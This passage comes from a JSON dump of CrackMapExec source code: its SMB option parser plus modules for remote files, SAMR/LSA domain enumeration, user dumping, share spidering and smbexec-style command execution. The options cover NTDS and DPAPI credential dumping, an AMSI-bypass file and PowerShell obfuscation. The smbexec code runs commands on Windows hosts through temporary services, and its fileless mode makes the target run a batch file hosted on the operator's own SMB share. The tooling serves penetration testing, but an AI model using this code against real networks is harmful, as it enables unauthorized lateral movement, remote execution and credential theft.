specifed method\\n(default: drsuapi)\")\n cgroup.add_argument(\"--dpapi\", choices={\"cookies\",\"nosystem\"}, nargs=\"*\",\n help=\"dump DPAPI secrets from target systems, can dump cookies if you add \\\"cookies\\\", will not dump SYSTEM dpapi if you add nosystem\\n\")\n # cgroup.add_argument(\"--ntds-history\", action='store_true', help='Dump NTDS.dit password history')\n # cgroup.add_argument(\"--ntds-pwdLastSet\", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account')\n\n ngroup = smb_parser.add_argument_group(\"Credential Gathering\", \"Options for gathering credentials\")\n ngroup.add_argument(\"--mkfile\", action=\"store\",\n help=\"DPAPI option. File with masterkeys in form of {GUID}:SHA1\")\n ngroup.add_argument(\"--pvk\", action=\"store\", help=\"DPAPI option. File with domain backupkey\")\n ngroup.add_argument(\"--enabled\", action=\"store_true\", help=\"Only dump enabled targets from DC\")\n ngroup.add_argument(\"--user\", dest=\"userntds\", type=str, help=\"Dump selected user from DC\")\n\n egroup = smb_parser.add_argument_group(\"Mapping/Enumeration\", \"Options for Mapping/Enumerating\")\n egroup.add_argument(\"--shares\", action=\"store_true\", help=\"enumerate shares and access\")\n egroup.add_argument(\"--no-write-check\", action=\"store_true\", help=\"Skip write check on shares (avoid leaving traces when missing delete permissions)\")\n\n egroup.add_argument(\"--filter-shares\", nargs=\"+\",\n help=\"Filter share by access, option 'read' 'write' or 'read,write'\")\n egroup.add_argument(\"--sessions\", action=\"store_true\", help=\"enumerate active sessions\")\n egroup.add_argument(\"--disks\", action=\"store_true\", help=\"enumerate disks\")\n egroup.add_argument(\"--loggedon-users-filter\", action=\"store\",\n help=\"only search for specific user, works with regex\")\n egroup.add_argument(\"--loggedon-users\", action=\"store_true\", help=\"enumerate logged on users\")\n egroup.add_argument(\"--users\", nargs=\"?\", const=\"\", metavar=\"USER\",\n help=\"enumerate domain users, if a user is specified than only its information is queried.\")\n egroup.add_argument(\"--groups\", nargs=\"?\", const=\"\", metavar=\"GROUP\",\n help=\"enumerate domain groups, if a group is specified than its members are enumerated\")\n egroup.add_argument(\"--computers\", nargs=\"?\", const=\"\", metavar=\"COMPUTER\", help=\"enumerate computer users\")\n egroup.add_argument(\"--local-groups\", nargs=\"?\", const=\"\", metavar=\"GROUP\",\n help=\"enumerate local groups, if a group is specified then its members are enumerated\")\n egroup.add_argument(\"--pass-pol\", action=\"store_true\", help=\"dump password policy\")\n egroup.add_argument(\"--rid-brute\", nargs=\"?\", type=int, const=4000, metavar=\"MAX_RID\",\n help=\"enumerate users by bruteforcing RID's (default: 4000)\")\n egroup.add_argument(\"--wmi\", metavar=\"QUERY\", type=str, help=\"issues the specified WMI query\")\n egroup.add_argument(\"--wmi-namespace\", metavar=\"NAMESPACE\", default=\"root\\\\cimv2\",\n help=\"WMI Namespace (default: root\\\\cimv2)\")\n\n sgroup = smb_parser.add_argument_group(\"Spidering\", 'Options for spidering shares')\n sgroup.add_argument(\"--spider\", metavar=\"SHARE\", type=str, help=\"share to spider\")\n sgroup.add_argument(\"--spider-folder\", metavar=\"FOLDER\", default=\".\", type=str,\n help=\"folder to spider (default: root share directory)\")\n sgroup.add_argument(\"--content\", action=\"store_true\", help=\"enable file content searching\")\n sgroup.add_argument(\"--exclude-dirs\", type=str, metavar=\"DIR_LIST\", default=\"\",\n help=\"directories to exclude from spidering\")\n segroup = sgroup.add_mutually_exclusive_group()\n segroup.add_argument(\"--pattern\", nargs=\"+\",\n help=\"pattern(s) to search for in folders, filenames and file content\")\n segroup.add_argument(\"--regex\", nargs=\"+\", help=\"regex(s) to search for in folders, filenames and file content\")\n sgroup.add_argument(\"--depth\", type=int, default=None,\n help=\"max spider recursion depth (default: infinity & beyond)\")\n sgroup.add_argument(\"--only-files\", action=\"store_true\", help=\"only spider files\")\n\n tgroup = smb_parser.add_argument_group(\"Files\", \"Options for put and get remote files\")\n tgroup.add_argument(\"--put-file\", nargs=2, metavar=\"FILE\", help=\"Put a local file into remote target, ex: whoami.txt \\\\\\\\Windows\\\\\\\\Temp\\\\\\\\whoami.txt\")\n tgroup.add_argument(\"--get-file\", nargs=2, metavar=\"FILE\", help=\"Get a remote file, ex: \\\\\\\\Windows\\\\\\\\Temp\\\\\\\\whoami.txt whoami.txt\")\n tgroup.add_argument(\"--append-host\", action=\"store_true\", help=\"append the host to the get-file filename\")\n\n cgroup = smb_parser.add_argument_group(\"Command Execution\", \"Options for executing commands\")\n cgroup.add_argument(\"--exec-method\", choices={\"wmiexec\", \"mmcexec\", \"smbexec\", \"atexec\"}, default=None,\n help=\"method to execute the command. Ignored if in MSSQL mode (default: wmiexec)\")\n cgroup.add_argument(\"--dcom-timeout\", help=\"DCOM connection timeout, default is 5 secondes\", type=int, default=5)\n cgroup.add_argument(\"--get-output-tries\", help=\"Number of times atexec/smbexec/mmcexec tries to get results, default is 5\", type=int, default=5)\n cgroup.add_argument(\"--codec\", default=\"utf-8\",\n help=\"Set encoding used (codec) from the target's output (default \"\n \"\\\"utf-8\\\"). If errors are detected, run chcp.com at the target, \"\n \"map the result with \"\n \"https://docs.python.org/3/library/codecs.html#standard-encodings and then execute \"\n \"again with --codec and the corresponding codec\")\n cgroup.add_argument(\"--force-ps32\", action=\"store_true\",\n help=\"force the PowerShell command to run in a 32-bit process\")\n cgroup.add_argument(\"--no-output\", action=\"store_true\", help=\"do not retrieve command output\")\n cegroup = cgroup.add_mutually_exclusive_group()\n cegroup.add_argument(\"-x\", metavar=\"COMMAND\", dest=\"execute\", help=\"execute the specified command\")\n cegroup.add_argument(\"-X\", metavar=\"PS_COMMAND\", dest=\"ps_execute\", help=\"execute the specified PowerShell command\")\n psgroup = smb_parser.add_argument_group(\"Powershell Obfuscation\", \"Options for PowerShell script obfuscation\")\n psgroup.add_argument(\"--obfs\", action=\"store_true\", help=\"Obfuscate PowerShell scripts\")\n psgroup.add_argument('--amsi-bypass', nargs=1, metavar=\"FILE\", help='File with a custom AMSI bypass')\n psgroup.add_argument(\"--clear-obfscripts\", action=\"store_true\", help=\"Clear all cached obfuscated PowerShell scripts\")\n\n return parser" }, { "path": "cme/protocols/smb/remotefile.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom impacket.smb3structs import FILE_READ_DATA, FILE_WRITE_DATA\n\n\nclass RemoteFile:\n def __init__(\n self,\n smbConnection,\n fileName,\n share=\"ADMIN$\",\n access=FILE_READ_DATA | FILE_WRITE_DATA,\n ):\n self.__smbConnection = smbConnection\n self.__share = share\n self.__access = access\n self.__fileName = fileName\n self.__tid = self.__smbConnection.connectTree(share)\n self.__fid = None\n self.__currentOffset = 0\n\n def open(self):\n self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName, desiredAccess=self.__access)\n\n def seek(self, offset, whence):\n # Implement whence, for now it's always from the beginning of the file\n if whence == 0:\n self.__currentOffset = offset\n\n def read(self, bytesToRead):\n if bytesToRead > 0:\n data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead)\n self.__currentOffset += len(data)\n return data\n return \"\"\n\n def close(self):\n if self.__fid is not None:\n self.__smbConnection.closeFile(self.__tid, self.__fid)\n self.__fid = None\n\n def delete(self):\n self.__smbConnection.deleteFile(self.__share, self.__fileName)\n\n def tell(self):\n return self.__currentOffset\n\n def __str__(self):\n return f\"\\\\\\\\{self.__smbConnection.getRemoteHost()}\\\\{self.__share}\\\\{self.__fileName}\"\n" }, { "path": "cme/protocols/smb/samrfunc.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Majorly stolen from https://gist.github.com/ropnop/7a41da7aabb8455d0898db362335e139\n# Which in turn stole from Impacket :)\n# Code refactored and added to by @mjhallenbeck (Marshall-Hallenbeck on GitHub)\n\nimport logging\n\nfrom impacket.dcerpc.v5 import transport, lsat, lsad, samr\nfrom impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE\nfrom impacket.nmb import NetBIOSError\nfrom impacket.smbconnection import SessionError\nfrom cme.logger import cme_logger\n\n\nclass SamrFunc:\n def __init__(self, connection):\n self.logger = connection.logger\n self.addr = connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain\n self.protocol = connection.args.port\n self.username = connection.username\n self.password = connection.password\n self.domain = connection.domain\n self.hash = connection.hash\n self.lmhash = \"\"\n self.nthash = \"\"\n self.aesKey = connection.aesKey\n self.doKerberos = connection.kerberos\n\n if self.hash is not None:\n if self.hash.find(\":\") != -1:\n self.lmhash, self.nthash = self.hash.split(\":\")\n else:\n self.nthash = self.hash\n\n if self.password is None:\n self.password = \"\"\n\n self.samr_query = SAMRQuery(\n username=self.username,\n password=self.password,\n domain=self.domain,\n remote_name=self.addr,\n remote_host=self.addr,\n kerberos=self.doKerberos,\n aesKey=self.aesKey,\n )\n self.lsa_query = LSAQuery(\n username=self.username,\n password=self.password,\n domain=self.domain,\n remote_name=self.addr,\n remote_host=self.addr,\n kerberos=self.doKerberos,\n aesKey=self.aesKey,\n logger=self.logger\n )\n\n def get_builtin_groups(self):\n domains = self.samr_query.get_domains()\n\n if \"Builtin\" not in domains:\n logging.error(f\"No Builtin group to query locally on\")\n return\n\n domain_handle = self.samr_query.get_domain_handle(\"Builtin\")\n groups = self.samr_query.get_domain_aliases(domain_handle)\n\n return groups\n\n def get_custom_groups(self):\n domains = self.samr_query.get_domains()\n custom_groups = {}\n\n for domain in domains:\n if domain == \"Builtin\":\n continue\n domain_handle = self.samr_query.get_domain_handle(domain)\n custom_groups.update(self.samr_query.get_domain_aliases(domain_handle))\n return custom_groups\n\n def get_local_groups(self):\n builtin_groups = self.get_builtin_groups()\n custom_groups = self.get_custom_groups()\n return {**builtin_groups, **custom_groups}\n\n def get_local_users(self):\n pass\n\n def get_local_administrators(self):\n self.get_builtin_groups()\n if \"Administrators\" in self.groups:\n self.logger.success(f\"Found Local Administrators group: RID {self.groups['Administrators']}\")\n domain_handle = self.samr_query.get_domain_handle(\"Builtin\")\n self.logger.debug(f\"Querying group members\")\n member_sids = self.samr_query.get_alias_members(domain_handle, self.groups[\"Administrators\"])\n member_names = self.lsa_query.lookup_sids(member_sids)\n\n for sid, name in zip(member_sids, member_names):\n print(f\"{name} - {sid}\")\n\n\nclass SAMRQuery:\n def __init__(\n self,\n username=\"\",\n password=\"\",\n domain=\"\",\n port=445,\n remote_name=\"\",\n remote_host=\"\",\n kerberos=None,\n aesKey=\"\",\n ):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = \"\"\n self.__nthash = \"\"\n self.__aesKey = aesKey\n self.__port = port\n self.__remote_name = remote_name\n self.__remote_host = remote_host\n self.__kerberos = kerberos\n self.dce = self.get_dce()\n self.server_handle = self.get_server_handle()\n\n def get_transport(self):\n string_binding = f\"ncacn_np:{self.__port}[\\pipe\\samr]\"\n cme_logger.debug(f\"Binding to {string_binding}\")\n # using a direct SMBTransport instead of DCERPCTransportFactory since we need the filename to be '\\samr'\n rpc_transport = transport.SMBTransport(\n self.__remote_host,\n self.__port,\n r\"\\samr\",\n self.__username,\n self.__password,\n self.__domain,\n self.__lmhash,\n self.__nthash,\n self.__aesKey,\n doKerberos=self.__kerberos,\n )\n return rpc_transport\n\n def get_dce(self):\n rpc_transport = self.get_transport()\n try:\n dce = rpc_transport.get_dce_rpc()\n dce.connect()\n dce.bind(samr.MSRPC_UUID_SAMR)\n except NetBIOSError as e:\n logging.error(f\"NetBIOSError on Connection: {e}\")\n return\n except SessionError as e:\n logging.error(f\"SessionError on Connection: {e}\")\n return\n return dce\n\n def get_server_handle(self):\n if self.dce:\n try:\n resp = samr.hSamrConnect(self.dce)\n except samr.DCERPCException as e:\n cme_logger.debug(f\"Error while connecting with Samr: {e}\")\n return None\n return resp[\"ServerHandle\"]\n else:\n cme_logger.debug(f\"Error creating Samr handle\")\n return\n\n def get_domains(self):\n resp = samr.hSamrEnumerateDomainsInSamServer(self.dce, self.server_handle)\n domains = resp[\"Buffer\"][\"Buffer\"]\n domain_names = []\n for domain in domains:\n domain_names.append(domain[\"Name\"])\n return domain_names\n\n def get_domain_handle(self, domain_name):\n resp = samr.hSamrLookupDomainInSamServer(self.dce, self.server_handle, domain_name)\n resp = samr.hSamrOpenDomain(self.dce, serverHandle=self.server_handle, domainId=resp[\"DomainId\"])\n return resp[\"DomainHandle\"]\n\n def get_domain_aliases(self, domain_handle):\n resp = samr.hSamrEnumerateAliasesInDomain(self.dce, domain_handle)\n aliases = {}\n for alias in resp[\"Buffer\"][\"Buffer\"]:\n aliases[alias[\"Name\"]] = alias[\"RelativeId\"]\n return aliases\n\n def get_alias_handle(self, domain_handle, alias_id):\n resp = samr.hSamrOpenAlias(self.dce, domain_handle, desiredAccess=MAXIMUM_ALLOWED, aliasId=alias_id)\n return resp[\"AliasHandle\"]\n\n def get_alias_members(self, domain_handle, alias_id):\n alias_handle = self.get_alias_handle(domain_handle, alias_id)\n resp = samr.hSamrGetMembersInAlias(self.dce, alias_handle)\n member_sids = []\n for member in resp[\"Members\"][\"Sids\"]:\n member_sids.append(member[\"SidPointer\"].formatCanonical())\n return member_sids\n\n\nclass LSAQuery:\n def __init__(\n self,\n username=\"\",\n password=\"\",\n domain=\"\",\n port=445,\n remote_name=\"\",\n remote_host=\"\",\n aesKey=\"\",\n kerberos=None,\n logger=None\n ):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = \"\"\n self.__nthash = \"\"\n self.__aesKey = aesKey\n self.__port = port\n self.__remote_name = remote_name\n self.__remote_host = remote_host\n self.__kerberos = kerberos\n self.dce = self.get_dce()\n self.policy_handle = self.get_policy_handle()\n self.logger = logger\n\n def get_transport(self):\n string_binding = f\"ncacn_np:{self.__remote_name}[\\\\pipe\\\\lsarpc]\"\n rpc_transport = transport.DCERPCTransportFactory(string_binding)\n rpc_transport.set_dport(self.__port)\n rpc_transport.setRemoteHost(self.__remote_host)\n if self.__kerberos:\n rpc_transport.set_kerberos(True, None)\n if hasattr(rpc_transport, \"set_credentials\"):\n # This method exists only for selected protocol sequences.\n rpc_transport.set_credentials(\n self.__username,\n self.__password,\n self.__domain,\n self.__lmhash,\n self.__nthash,\n self.__aesKey,\n )\n return rpc_transport\n\n def get_dce(self):\n rpc_transport = self.get_transport()\n try:\n dce = rpc_transport.get_dce_rpc()\n if self.__kerberos:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.connect()\n dce.bind(lsat.MSRPC_UUID_LSAT)\n except NetBIOSError as e:\n self.logger.fail(f\"NetBIOSError on Connection: {e}\")\n return None\n return dce\n\n def get_policy_handle(self):\n resp = lsad.hLsarOpenPolicy2(self.dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)\n return resp[\"PolicyHandle\"]\n\n def lookup_sids(self, sids):\n resp = lsat.hLsarLookupSids(self.dce, self.policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)\n names = []\n for translated_names in resp[\"TranslatedNames\"][\"Names\"]:\n names.append(translated_names[\"Name\"])\n return names\n" }, { "path": "cme/protocols/smb/samruser.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Stolen from Impacket\n\nfrom impacket.dcerpc.v5 import transport, samr\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.rpcrt import DCERPC_v5\nfrom impacket.nt_errors import STATUS_MORE_ENTRIES\n\n\nclass UserSamrDump:\n KNOWN_PROTOCOLS = {\n \"139/SMB\": (r\"ncacn_np:%s[\\pipe\\samr]\", 139),\n \"445/SMB\": (r\"ncacn_np:%s[\\pipe\\samr]\", 445),\n }\n\n def __init__(self, connection):\n self.logger = connection.logger\n self.addr = connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain\n self.protocol = connection.args.port\n self.username = connection.username\n self.password = connection.password\n self.domain = connection.domain\n self.hash = connection.hash\n self.lmhash = \"\"\n self.nthash = \"\"\n self.aesKey = connection.aesKey\n self.doKerberos = connection.kerberos\n self.protocols = UserSamrDump.KNOWN_PROTOCOLS.keys()\n self.users = []\n\n if self.hash is not None:\n if self.hash.find(\":\") != -1:\n self.lmhash, self.nthash = self.hash.split(\":\")\n else:\n self.nthash = self.hash\n\n if self.password is None:\n self.password = \"\"\n\n def dump(self):\n # Try all requested protocols until one works.\n for protocol in self.protocols:\n try:\n protodef = UserSamrDump.KNOWN_PROTOCOLS[protocol]\n port = protodef[1]\n except KeyError as e:\n self.logger.debug(f\"Invalid Protocol '{protocol}'\")\n self.logger.debug(f\"Trying protocol {protocol}\")\n rpctransport = transport.SMBTransport(\n self.addr,\n port,\n r\"\\samr\",\n self.username,\n self.password,\n self.domain,\n self.lmhash,\n self.nthash,\n self.aesKey,\n doKerberos=self.doKerberos,\n )\n try:\n self.fetchList(rpctransport)\n break\n except Exception as e:\n self.logger.debug(f\"Protocol failed: {e}\")\n return self.users\n\n def fetchList(self, rpctransport):\n dce = DCERPC_v5(rpctransport)\n dce.connect()\n dce.bind(samr.MSRPC_UUID_SAMR)\n\n # Setup Connection\n resp = samr.hSamrConnect2(dce)\n if resp[\"ErrorCode\"] != 0:\n raise Exception(\"Connect error\")\n\n resp2 = samr.hSamrEnumerateDomainsInSamServer(\n dce,\n serverHandle=resp[\"ServerHandle\"],\n enumerationContext=0,\n preferedMaximumLength=500,\n )\n if resp2[\"ErrorCode\"] != 0:\n raise Exception(\"Connect error\")\n\n resp3 = samr.hSamrLookupDomainInSamServer(\n dce,\n serverHandle=resp[\"ServerHandle\"],\n name=resp2[\"Buffer\"][\"Buffer\"][0][\"Name\"],\n )\n if resp3[\"ErrorCode\"] != 0:\n raise Exception(\"Connect error\")\n\n resp4 = samr.hSamrOpenDomain(\n dce,\n serverHandle=resp[\"ServerHandle\"],\n desiredAccess=samr.MAXIMUM_ALLOWED,\n domainId=resp3[\"DomainId\"],\n )\n if resp4[\"ErrorCode\"] != 0:\n raise Exception(\"Connect error\")\n\n self.__domains = resp2[\"Buffer\"][\"Buffer\"]\n domainHandle = resp4[\"DomainHandle\"]\n # End Setup\n\n status = STATUS_MORE_ENTRIES\n enumerationContext = 0\n while status == STATUS_MORE_ENTRIES:\n try:\n resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext=enumerationContext)\n except DCERPCException as e:\n if str(e).find(\"STATUS_MORE_ENTRIES\") < 0:\n self.logger.fail(\"Error enumerating domain user(s)\")\n break\n resp = e.get_packet()\n self.logger.success(\"Enumerated domain user(s)\")\n for user in resp[\"Buffer\"][\"Buffer\"]:\n r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user[\"RelativeId\"])\n info = samr.hSamrQueryInformationUser2(dce, r[\"UserHandle\"], samr.USER_INFORMATION_CLASS.UserAllInformation)\n (username, uid, info_user) = (\n user[\"Name\"],\n user[\"RelativeId\"],\n info[\"Buffer\"][\"All\"],\n )\n self.logger.highlight(f\"{self.domain}\\\\{user['Name']:<30} {info_user['AdminComment']}\")\n self.users.append(user[\"Name\"])\n samr.hSamrCloseHandle(dce, r[\"UserHandle\"])\n\n enumerationContext = resp[\"EnumerationContext\"]\n status = resp[\"ErrorCode\"]\n\n dce.disconnect()\n" }, { "path": "cme/protocols/smb/smbexec.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom os.path import join as path_join\nfrom time import sleep\nfrom impacket.dcerpc.v5 import transport, scmr\nfrom cme.helpers.misc import gen_random_string\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE\n\n\nclass SMBEXEC:\n def __init__(\n self,\n host,\n share_name,\n smbconnection,\n protocol,\n username=\"\",\n password=\"\",\n domain=\"\",\n doKerberos=False,\n aesKey=None,\n kdcHost=None,\n hashes=None,\n share=None,\n port=445,\n logger=None,\n tries=None\n ):\n self.__host = host\n self.__share_name = \"C$\"\n self.__port = port\n self.__username = username\n self.__password = password\n self.__serviceName = gen_random_string()\n self.__domain = domain\n self.__lmhash = \"\"\n self.__nthash = \"\"\n self.__share = share\n self.__smbconnection = smbconnection\n self.__output = None\n self.__batchFile = None\n self.__outputBuffer = b\"\"\n self.__shell = \"%COMSPEC% /Q /c \"\n self.__retOutput = False\n self.__rpctransport = None\n self.__scmr = None\n self.__conn = None\n # self.__mode = mode\n self.__aesKey = aesKey\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__tries = tries\n self.logger = logger\n\n if hashes is not None:\n # This checks to see if we didn't provide the LM Hash\n if hashes.find(\":\") != -1:\n self.__lmhash, self.__nthash = hashes.split(\":\")\n else:\n self.__nthash = hashes\n\n if self.__password is None:\n self.__password = \"\"\n\n stringbinding = \"ncacn_np:%s[\\pipe\\svcctl]\" % self.__host\n self.logger.debug(\"StringBinding %s\" % stringbinding)\n self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)\n self.__rpctransport.set_dport(self.__port)\n\n if hasattr(self.__rpctransport, \"setRemoteHost\"):\n self.__rpctransport.setRemoteHost(self.__host)\n if hasattr(self.__rpctransport, \"set_credentials\"):\n # This method exists only for selected protocol sequences.\n self.__rpctransport.set_credentials(\n self.__username,\n self.__password,\n self.__domain,\n self.__lmhash,\n self.__nthash,\n self.__aesKey,\n )\n self.__rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n\n self.__scmr = self.__rpctransport.get_dce_rpc()\n if self.__doKerberos:\n self.__scmr.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n self.__scmr.connect()\n s = self.__rpctransport.get_smb_connection()\n # We don't wanna deal with timeouts from now on.\n s.setTimeout(100000)\n\n self.__scmr.bind(scmr.MSRPC_UUID_SCMR)\n resp = scmr.hROpenSCManagerW(self.__scmr)\n self.__scHandle = resp[\"lpScHandle\"]\n\n def execute(self, command, output=False):\n self.__retOutput = output\n if os.path.isfile(command):\n with open(command) as commands:\n for c in commands:\n self.execute_remote(c.strip())\n else:\n self.execute_remote(command)\n self.finish()\n return self.__outputBuffer\n\n def output_callback(self, data):\n self.__outputBuffer += data\n\n def execute_remote(self, data):\n self.__output = gen_random_string(6)\n self.__batchFile = gen_random_string(6) + \".bat\"\n\n if self.__retOutput:\n command = self.__shell + \"echo \" + data + f\" ^> \\\\\\\\127.0.0.1\\\\{self.__share_name}\\\\{self.__output} 2^>^&1 > %TEMP%\\{self.__batchFile} & %COMSPEC% /Q /c %TEMP%\\{self.__batchFile} & %COMSPEC% /Q /c del %TEMP%\\{self.__batchFile}\"\n else:\n command = self.__shell + data\n\n with open(path_join(\"/tmp\", \"cme_hosted\", self.__batchFile), \"w\") as batch_file:\n batch_file.write(command)\n\n self.logger.debug(\"Hosting batch file with command: \" + command)\n\n # command = self.__shell + '\\\\\\\\{}\\\\{}\\\\{}'.format(local_ip,self.__share_name, self.__batchFile)\n self.logger.debug(\"Command to execute: \" + command)\n\n self.logger.debug(f\"Remote service {self.__serviceName} created.\")\n \n try:\n resp = scmr.hRCreateServiceW(\n self.__scmr,\n self.__scHandle,\n self.__serviceName,\n self.__serviceName,\n lpBinaryPathName=command,\n dwStartType=scmr.SERVICE_DEMAND_START,\n )\n service = resp[\"lpServiceHandle\"]\n except Exception as e:\n if \"rpc_s_access_denied\" in str(e):\n self.logger.fail(\"SMBEXEC: Create services got blocked.\")\n else:\n self.logger.fail(str(e))\n \n return self.__outputBuffer\n\n try:\n self.logger.debug(f\"Remote service {self.__serviceName} started.\")\n scmr.hRStartServiceW(self.__scmr, service)\n\n self.logger.debug(f\"Remote service {self.__serviceName} deleted.\")\n scmr.hRDeleteService(self.__scmr, service)\n scmr.hRCloseServiceHandle(self.__scmr, service)\n except Exception as e:\n pass\n\n self.get_output_remote()\n\n def get_output_remote(self):\n if self.__retOutput is False:\n self.__outputBuffer = \"\"\n return\n tries = 1\n while True:\n try:\n self.logger.info(f\"Attempting to read {self.__share}\\\\{self.__output}\")\n self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)\n break\n except Exception as e:\n if tries >= self.__tries:\n self.logger.fail(f'SMBEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option \"--get-output-tries\". If it\\'s still failing maybe something is blocking the schedule job, try another exec method')\n break\n if str(e).find(\"STATUS_BAD_NETWORK_NAME\") >0 :\n self.logger.fail(f'SMBEXEC: Get ouput failed, target has blocked {self.__share} access (maybe command executed!)')\n break\n if str(e).find(\"STATUS_SHARING_VIOLATION\") >= 0 or str(e).find(\"STATUS_OBJECT_NAME_NOT_FOUND\") >= 0:\n # Output not finished, let's wait\n sleep(2)\n tries += 1\n else:\n self.logger.debug(str(e))\n \n if self.__outputBuffer:\n self.logger.debug(f\"Deleting file {self.__share}\\\\{self.__output}\")\n self.__smbconnection.deleteFile(self.__share, self.__output)\n\n def execute_fileless(self, data):\n self.__output = gen_random_string(6)\n self.__batchFile = gen_random_string(6) + \".bat\"\n local_ip = self.__rpctransport.get_socket().getsockname()[0]\n\n if self.__retOutput:\n command = self.__shell + data + f\" ^> \\\\\\\\{local_ip}\\\\{self.__share_name}\\\\{self.__output}\"\n else:\n command = self.__shell + data\n\n with open(path_join(\"/tmp\", \"cme_hosted\", self.__batchFile), \"w\") as batch_file:\n batch_file.write(command)\n\n self.logger.debug(\"Hosting batch file with command: \" + command)\n\n command = self.__shell + f\"\\\\\\\\{local_ip}\\\\{self.__share_name}\\\\{self.__batchFile}\"\n self.logger.debug(\"Command to execute: \" + command)\n\n self.logger.debug(f\"Remote service {self.__serviceName} created.\")\n resp = scmr.hRCreateServiceW(\n self.__scmr,\n self.__scHandle,\n self.__serviceName,\n self.__serviceName,\n lpBinaryPathName=command,\n dwStartType=scmr.SERVICE_DEMAND_START,\n )\n service = resp[\"lpServiceHandle\"]\n\n try:\n self.logger.debug(f\"Remote service {self.__serviceName} started.\")\n scmr.hRStartServiceW(self.__scmr, service)\n except:\n pass\n self.logger.debug(f\"Remote service {self.__serviceName} deleted.\")\n scmr.hRDeleteService(self.__scmr, service)\n scmr.hRCloseServiceHandle(self.__scmr, service)\n self.get_output_fileless()\n\n def get_output_fileless(self):\n if not self.__retOutput:\n return\n\n while True:\n try:\n with open(path_join(\"/tmp\", \"cme_hosted\", self.__output), \"rb\") as output:\n self.output_callback(output.read())\n break\n except IOError:\n sleep(2)\n\n def finish(self):\n # Just in case the service is still created\n try:\n self.__scmr = self.__rpctransport.get_dce_rpc()\n self.__scmr.connect()\n self.__scmr.bind(scmr.MSRPC_UUID_SCMR)\n resp = scmr.hROpenSCManagerW(self.__scmr)\n self.__scHandle = resp[\"lpScHandle\"]\n resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)\n service = resp[\"lpServiceHandle\"]\n scmr.hRDeleteService(self.__scmr, service)\n scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)\n scmr.hRCloseServiceHandle(self.__scmr, service)\n except:\n pass\n" }, { "path": "cme/protocols/smb/smbspider.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom time import strftime, localtime\nfrom cme.protocols.smb.remotefile import RemoteFile\nfrom impacket.smb3structs import FILE_READ_DATA\nfrom impacket.smbconnection import SessionError\nimport re\nimport traceback\n\n\nclass SMBSpider:\n def __init__(self, smbconnection, logger):\n self.smbconnection = smbconnection\n self.logger = logger\n self.share = None\n self.regex = []\n self.pattern = []\n self.folder = None\n self.exclude_dirs = []\n self.onlyfiles = True\n self.content = False\n self.results = []\n\n def spider(\n self,\n share,\n folder=\".\",\n pattern=[],\n regex=[],\n exclude_dirs=[],\n depth=None,\n content=False,\n onlyfiles=True,\n ):\n if regex:\n try:\n self.regex = [re.compile(bytes(rx, \"utf8\")) for rx in regex]\n except Exception as e:\n self.logger.fail(f\"Regex compilation error: {e}\")\n\n self.folder = folder\n self.pattern = pattern\n self.exclude_dirs = exclude_dirs\n self.content = content\n self.onlyfiles = onlyfiles\n\n if share == \"*\":\n self.logger.display(\"Enumerating shares for spidering\")\n permissions = []\n try:\n for share in self.smbconnection.listShares():\n share_name = share[\"shi1_netname\"][:-1]\n share_remark = share[\"shi1_remark\"][:-1]\n try:\n self.smbconnection.listPath(share_name, \"*\")\n self.share = share_name\n self.logger.display(f\"Spidering share: {share_name}\")\n self._spider(folder, depth)\n except SessionError:\n pass\n except Exception as e:\n self.logger.fail(f\"Error enumerating shares: {e}\")\n else:\n self.share = share\n self.logger.display(f\"Spidering {folder}\")\n self._spider(folder, depth)\n\n return self.results\n\n def _spider(self, subfolder, depth):\n \"\"\"\n Abandon all hope ye who enter here.\n You're now probably wondering if I was drunk and/or high when writing this.\n Getting this to work took a toll on my sanity. So yes. a lot.\n \"\"\"\n\n # The following is some funky shit that deals with the way impacket treats file paths\n\n if subfolder in [\"\", \".\"]:\n subfolder = \"*\"\n\n elif subfolder.startswith(\"*/\"):\n subfolder = subfolder[2:] + \"/*\"\n else:\n subfolder = subfolder.replace(\"/*/\", \"/\") + \"/*\"\n\n # End of the funky shit... or is it? Surprise! This whole thing is funky\n\n filelist = None\n try:\n filelist = self.smbconnection.listPath(self.share, subfolder)\n self.dir_list(filelist, subfolder)\n if depth == 0:\n return\n except SessionError as e:\n if not filelist:\n if \"STATUS_ACCESS_DENIED\" not in str(e):\n self.logger.debug(f\"Failed listing files on share {self.share} in directory {subfolder}: {e}\")\n return\n\n for result in filelist:\n if result.is_directory() and result.get_longname() not in [\".\", \"..\"]:\n if subfolder == \"*\":\n self._spider(\n subfolder.replace(\"*\", \"\") + result.get_longname(),\n depth - 1 if depth else None,\n )\n elif subfolder != \"*\" and (subfolder[:-2].split(\"/\")[-1] not in self.exclude_dirs):\n self._spider(\n 